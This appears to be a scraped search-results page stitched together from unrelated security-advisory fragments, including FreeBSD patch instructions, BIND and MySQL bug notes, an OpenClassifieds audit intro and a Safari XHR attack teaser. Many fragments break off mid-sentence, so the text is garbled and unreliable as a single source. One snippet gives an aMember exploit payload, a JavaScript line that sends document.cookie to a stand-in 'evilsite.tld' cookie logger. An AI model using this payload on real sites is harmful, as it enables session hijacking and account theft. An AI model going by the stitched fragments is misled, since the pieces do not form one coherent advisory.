Next Page >>
make
901
3.4.2. Exploits
All the exploits are created using the accompanying Makefiles in the respective
subdirectories. When open in vim (or ex, view), the exploits create a file
called ``pwned'' in the current directory. To create all the exploits in a
certain subdirectory, run ``make all'' in that subdirectory. See the respective
Makefile sources for details.
mysql-server-5.1 5.1.41-3ubuntu12.7
Ubuntu 10.10:
mysql-server-5.1 5.1.49-1ubuntu8.1
In general, a standard system update will make all the necessary changes.
Details follow:
It was discovered that MySQL incorrectly handled certain requests with the
UPGRADE DATA DIRECTORY NAME command. An authenticated user could exploit
I. Background
BIND 9 is an implementation of the Domain Name System (DNS) protocols.
The named(8) daemon is an Internet Domain Name Server. DNS requests
contain a query id which is used to match a DNS request with the response
and to make it harder for anybody but the DNS server which received the
request to send a valid response.
II. Problem Description
The BIND DNS implementation does not randomize the UDP source port when
I. Background
BIND 9 is an implementation of the Domain Name System (DNS) protocols.
The named(8) daemon is an Internet Domain Name Server. DNS requests
contain a query id which is used match a DNS request with the response
and to make it harder for anybody but the DNS server which received the
request to send a valid response.
II. Problem Description
When named(8) is operating as a recursive DNS server or sending NOTIFY
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install
# /etc/rc.d/named restart
NOTE WELL: Users running FreeBSD 6 and using DNSSEC are advised to get
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install
# /etc/rc.d/named restart
VI. Correction details
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make install
# cd /usr/src/secure/usr.bin/openssl
# make obj && make depend && make && make install
NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install
# /etc/rc.d/named restart
c) Install and use a fixed version of BIND from the FreeBSD Ports
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssh
# make obj && make depend && make && make install
# cd /usr/src/secure/usr.sbin/sshd
# make obj && make depend && make && make install
# /etc/rc.d/sshd restart
VI. Correction details
urls and requiring an account before posting.
"This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."
Usually when I see that an application claims to be secure, they really don't know what the fuck they
are doing. OpenClassifieds' Security model is deeply flawed and as a result there are MANY
vulnerabilities in this code base which allowed me to string a few cool ones together to make an
interesting exploit. OpenClassifieds is sanitizing everything on input using cG() and cP(), these
functions are used to perform a mysql_real_escape_string() on all GET and POST variables. Most
servers aren't using an exotic character set so from a security stand point this is exactly identical to
magic_quotes_gpc. So I dusted off my usual magic_quotes_gpc auditing tricks, look for
stripslashes(),base64decode(),urldecode(),html_entity_decode() lack of quote marks around variables
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install
# /etc/rc.d/named restart
3) To update your vulnerable system via a binary patch:
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.bin/compress
# make obj && make depend && make && make install
# cd /usr/src/usr.bin/gzip
# make obj && make depend && make && make install
3) To update your vulnerable system via a binary patch:
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind/
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install
3) To update your vulnerable system via a binary patch:
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/libtelnet
# make obj && make depend && make && make install
# cd /usr/src/libexec/telnetd
# make obj && make depend && make && make install
3) To update your vulnerable system via a binary patch:
* XHR (XMLHttpRequest) as a vector for mail merging or wordlist attacks in
XPS/IPE attacks
We're going to show you how these two methods combine like Voltron into a whole
much larger than its parts. At the end of this short advisory you will be able
to take any Safari web browser and make it a spam drone, a wordlist-based logon
cracker for networks, or a relay for payloads to arbitrary daemons. You will be
able to do all of this without passing any shellcode or alerting any IDS to
compromise.
Let's cover the bug.
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/libtelnet
# make obj && make depend && make
# cd /usr/src/libexec/telnetd
# make obj && make depend && make && make install
VI. Correction details
Ingres r3 Vulnerability Updates Install Steps (August 1, 2008)
Unix/Linux:
1. Log on to your system using the installation owner account and
make sure the environment is set up correctly:
1. II_SYSTEM must be set to the Ingres system files
2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility
directories.
2. Change directory to the root directory of the Ingres
installation or use a previously created directory.
department).
If your company does not have an incident response team or incident
response procedures, you have to determine how to best notify your
company leadership. Since I do not know your company's social or
political climate, this is a call that you have to make on your own. If
you are not sure how your company will respond to your discovery, you
should consult with an attorney before moving forward. If you found the
vulnerability while performing unauthorized activities, you should
DEFINITELY consult an attorney before doing anything else.
process management solutions to organizations. The company's software
is used worldwide.
A security vulnerability was discovered in LANDesk Management Suite: a
cross-site request forgery which allows an external remote attacker to
make a command injection that can be used to execute arbitrary code
using the webserver user. As a result, an attacker can remove the
firewall and load a kernel module, allowing root access to the
appliance. It also can be used as a non-persistent XSS.
In order to be able to successfully make the attack, the administrator
> > attackers, because there are a multitude of possible attack vectors,
> > such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also
> > installed), and likely numerous other options.
>
> Once the attacker can run code as the same user > the webserver runs as, he
> can make the webserver do whatever he wants. He > can just 'debug' the
> webserver process and change any setting, inject code, whatever. You can
> php.ini whatever you want, and the attacker can > just make the webserver
> read his own php.ini, or change the webserver memory after the fact, to
> make it think it read something else than you wrote.
As you comment, using this feature exist a lock (for 2 hours) for
authentication attempts, and beyond this limit (100 requests) the
message returned by the application does not allow to known if the
analyzed password is correct or not. However, every 2 hours an attacker
could make 100 authentication attempts.
To overcome this limit (100 authentication attempts), it is sufficient
that the attacker has other Gmail accounts. Each account allows the
malicious user to make 100 new auhtentication attempts within 2 hours of
the blockade. If the attacker wants to make an authentication attempt by
many virtual hosts on a single physical system. Windows 7 relies on
Virtual PC technology to implement the backward compatibility XP Mode
for legacy Windows applications. Using XP Mode, Windows 7 users can run
Windows applications on a virtualized Windows XP SP3 operating system
directly from the Windows 7 desktop but in doing so they may be
inadvertently increasing their risk due to a bug that makes standard
Windows anti-exploitation mechanisms ineffective.
A vulnerability found in the memory management of the Virtual Machine
Monitor makes memory pages mapped above the 2GB available with read or
read/write access to user-space programs running in a Guest operating
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make includes && make && make install
NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libcrypto
# make obj && make depend && make includes && make && make install
NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
processes with superuser privileges. It is an extension of, but
far more powerful than, the traditional UNIX chroot(2) system call.
By design, neither the chroot(2) nor the jail(2) system call modify
existing open file descriptors of the calling process, in order to
allow programmers to make fine grained access control and privilege
separation.
The jail(8) utility creates a new jail or modifies an existing jail,
optionally imprisoning the current process (and future descendants)
inside it.
What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php
What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)
2) The file should contain the following:
HTML Code:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libcrypto
# make obj && make depend && make includes && make && make install
NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
> attackers, because there are a multitude of possible attack vectors,
> such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also
> installed), and likely numerous other options.
Once the attacker can run code as the same user the webserver runs as, he
can make the webserver do whatever he wants. He can just 'debug' the
webserver process and change any setting, inject code, whatever. You can
php.ini whatever you want, and the attacker can just make the webserver
read his own php.ini, or change the webserver memory after the fact, to
make it think it read something else than you wrote.
> Portfast modifies STP, it does not disable it.
Well, right, the interface configured with it goes straight from
blocking to forwarding. You got the idea.
>
> This does make a good argument for pvst and similar technologies running at the vlan level for enterprise networking.
I don't see the point. Having one instance of STP per vlan or one for
all, there is no point with the security issue here.
>
> But it is probably best to assume someone with access to a segment can see everything on that segment, pretend to be anyone else on that subnet, and inject anything onto that subnet. In other words, it is nearly impossible to protect reliability and somewhat privacy on a shared link.
the WerkzeugH. Its main goal is to help attendees understand the
current state of art in information technology and security, and
showcase projects evolved from the hackerspace movement.
This year's tagline: Make A Good Hack
-------------------------------------
After last year's tagline, 'The Internet is a Series of Tubes',
PlumberCon 10 will take our approach towards security, hacking and
Next Page>>
|
